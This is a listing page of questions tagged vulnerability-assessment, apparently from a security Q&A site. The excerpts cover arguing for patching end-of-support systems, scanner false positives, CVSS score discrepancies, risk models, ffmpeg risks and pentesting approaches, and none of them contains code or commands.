Questions tagged [vulnerability-assessment]
74 questions
108
votes
15 answers
How can I argue against: "System is unhackable so why patch vulnerabilities?"
An operating system has reached End of Support (EoS) so no more security patches are coming for the OS ever. An embedded device running this OS needs to be updated to a newer version. However, the engineers who designed the original product feel…
Ken
- 1,091
- 2
- 6
- 5
25
votes
4 answers
Should a vulnerability in a service that is present on the device, but not running and not used at all, be mentioned in the vulnerability report?
Say, I have scanned our Cisco Router, and it returned 20 vulnerabilities back. However, most of them are tied to specific services that this router is not running, for example CVE-2016-6380 - we are not running dns server on our cisco thus we are…
shivelin
- 458
- 4
- 7
12
votes
2 answers
Tons of vulnerabilities are found on tcp/0 port using vulnerability scanners
Performed credentialed Vulnerability scan on linux/Unix servers by Nessus and thousand of vulnerability came out of port tcp/0. How could a IANA reserved port(tcp/0) handle traffic? Are those vulnerability truly countable or those came out as false…
Shakir
- 185
- 2
- 13
9
votes
3 answers
Is "Discoverability = low" an acceptable reason to reduce the risk of a vulnerability?
The outdated DREAD risk model (wikipedia) lists Discoverability as a criteria for judging the severity of a vulnerability. The idea being that something which is not publicly known and you would be unlikely to discover without deep knowledge of the…
Mike Ounsworth
- 57,707
- 21
- 150
- 207
8
votes
1 answer
Security risks of using ffmpeg as part of web service
I'm working on a web service that uses ffmpeg on the backend for processing user uploaded media files. I'm giving the users some options to customize how their videos are processed, which is essentially parameterize the ffmpeg command.
I'm planning…
leros
- 183
- 1
- 5
6
votes
1 answer
What exactly is CVE-2021-23978 (from MSFA2021-08 in Mozilla Firefox)?
A number of vulnerabilities were fixed in Firefox in the latest update. MSFA2021-08 describes it only as "memory issues that may be exploitable", and doesn't give any information:
Mozilla developers Alexis Beingessner, Tyson Smith, Nika Layzell,…
forest
- 64,616
- 20
- 206
- 257
5
votes
2 answers
Vulnerable framework and IIS server version's are being displayed in an error page of a 3rd party application
As security tester, I need to report and justify that a security misconfiguration in a 3rd party application is a risk to us.
Following is the scenario:
1.) There is a 3rd party application which the customers use to submit their applications to…
Sai Dutt Mekala
- 343
- 2
- 10
5
votes
2 answers
Why are the CVSS scores differ so much between Redhat and NVD page?
take CVE-2016-7872 for example.
in National Vulnerability Database webpage, we can see that the cvss2 and cvss3 score are 9.8 and 10.0 respectively.
but in the redhat security advisory page, they are 6.8 and 8.8.
To my understanding, cvss score are…
Sajuuk
- 271
- 3
- 11
5
votes
2 answers
How do pentesters approach a large complex network?
Lots of books talk about using tools such as whois and other information gathering tools to collect information on the network and of course, not forgetting nmap. However, in a real network with such a large number of hosts, wouldn't there be an…
Lew Wei Hao
- 429
- 5
- 13
4
votes
2 answers
OpenVAS won't generate SCAP Database
To deploy OpenVAS to Virtual machines I've been using Ansible for a while and it worked pretty well. Now today I wanted to deploy it to another machine but the openvas-check-setup script keeps telling me that the setup isn't yet finished because the…
davidb
- 4,285
- 3
- 19
- 31
4
votes
3 answers
How to maintain balance between integrity and client satisfaction in vulnerability assessments
I have done a number of vulnerability assessments and I'm noticing a trend. In the first assessment the clients are impressed and grateful for the massive security holes I find. During the second and third assessments, they feel frustrated because…
user3280964
- 1,130
- 2
- 7
- 13
4
votes
2 answers
Buffer Overflow doesn't have enough space for exploit after being crashed
So I'm trying to write a buffer overflow for a knowingly vulnerable server application, I want to learn how to do this on my own and just want some direction.
I'm watching it in immunity debugger on the server and have control over the ECX, EBP, and…
Hadoken
- 53
- 2
- 7
4
votes
2 answers
Way of categorising and organising types of security issues and areas
I have recently done a security review and uncovered 200 or so areas to improve upon covering a very diverse range of topics; Some points are process, some are config, some are new systems to be implemented. Everything from SAST, architecture to…
ZZ9
- 273
- 1
- 7
3
votes
4 answers
Risk of web admin portal without extra authentication steps
more of a philosophical question, suppose there is one behavior which allows an attacker to do something with high impact but by itself cannot be used to cause that impact. For example, internet accessible admin portal which even though still…
thevpt
- 31
- 1
3
votes
0 answers
Version earlier than 0 in Debian OVAL feeds
I'm trying to parse Debian OVAL feeds to establish if some packages are vulnerable or not. I'm using criterions to establish what's the vulnerable version for a package, however often there are entries saying that "version is earlier than 0", e.g.
…
Любомир Райков
- 31
- 1